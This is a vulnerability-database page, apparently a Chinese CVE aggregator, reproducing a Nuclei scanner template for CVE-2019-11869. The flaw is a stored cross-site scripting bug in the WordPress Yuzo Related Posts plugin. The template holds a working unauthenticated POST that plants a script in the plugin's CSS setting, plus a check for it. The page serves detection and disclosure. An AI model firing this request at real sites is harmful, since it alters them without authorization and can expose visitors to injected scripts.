CVE-2019-11869: WordPress Yuzo <5.12.94 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress Yuzo | POC: 已公开

漏洞描述

WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting because it mistakenly expects that is_admin() verifies that the request comes from an admin user (it actually only verifies that the request is for an admin page). An unauthenticated attacker can consequently inject a payload into the plugin settings, such as the yuzo_related_post_css_and_style setting.

PoC代码[已公开]

id: CVE-2019-11869

info:
  name: WordPress Yuzo <5.12.94 - Cross-Site Scripting
  author: ganofins
  severity: medium
  description: |
    WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting
    because it mistakenly expects that is_admin() verifies that the
    request comes from an admin user (it actually only verifies that the
    request is for an admin page). An unauthenticated attacker can consequently inject
    a payload into the plugin settings, such as the
    yuzo_related_post_css_and_style setting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability.
  reference:
    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
    - https://wpscan.com/vulnerability/9254
    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild/
    - https://wpvulndb.com/vulnerabilities/9254
    - https://nvd.nist.gov/vuln/detail/CVE-2019-11869
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-11869
    cwe-id: CWE-79
    epss-score: 0.06548
    epss-percentile: 0.90776
    cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: yuzopro
    product: yuzo
    framework: wordpress
  tags: cve,cve2019,wpscan,wordpress,wp-plugin,xss,yuzopro

http:
  - raw:
      - |
        POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        yuzo_related_post_css_and_style=</style><script>alert(0);</script>
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "<script>alert(0);</script>")'

      - type: dsl
        dsl:
          - "contains(tolower(header_2), 'text/html')"
# digest: 4b0a004830460221009857c21a4bd9c9c6e5a1c7b927017409bf4284fe551bb40292a8285d672ba8c70221009212cb9cb99475558759342211736589b04fdd767571076dbe7dbd758644b189:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2019/CVE-2019-11869.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2019-0193: Apache Solr Remote Code Execution POC

CVE-2019-0230: Apache Struts <=2.5.20 - Remote Code Execution S2-059 POC

CVE-2019-10758: Mongo-Express Remote Code Execution POC

CVE-2019-11581: Atlassian Jira未授权服务端模板注入漏洞 POC

CVE-2019-12725: Zeroshell 3.9.0 Remote Command Execution POC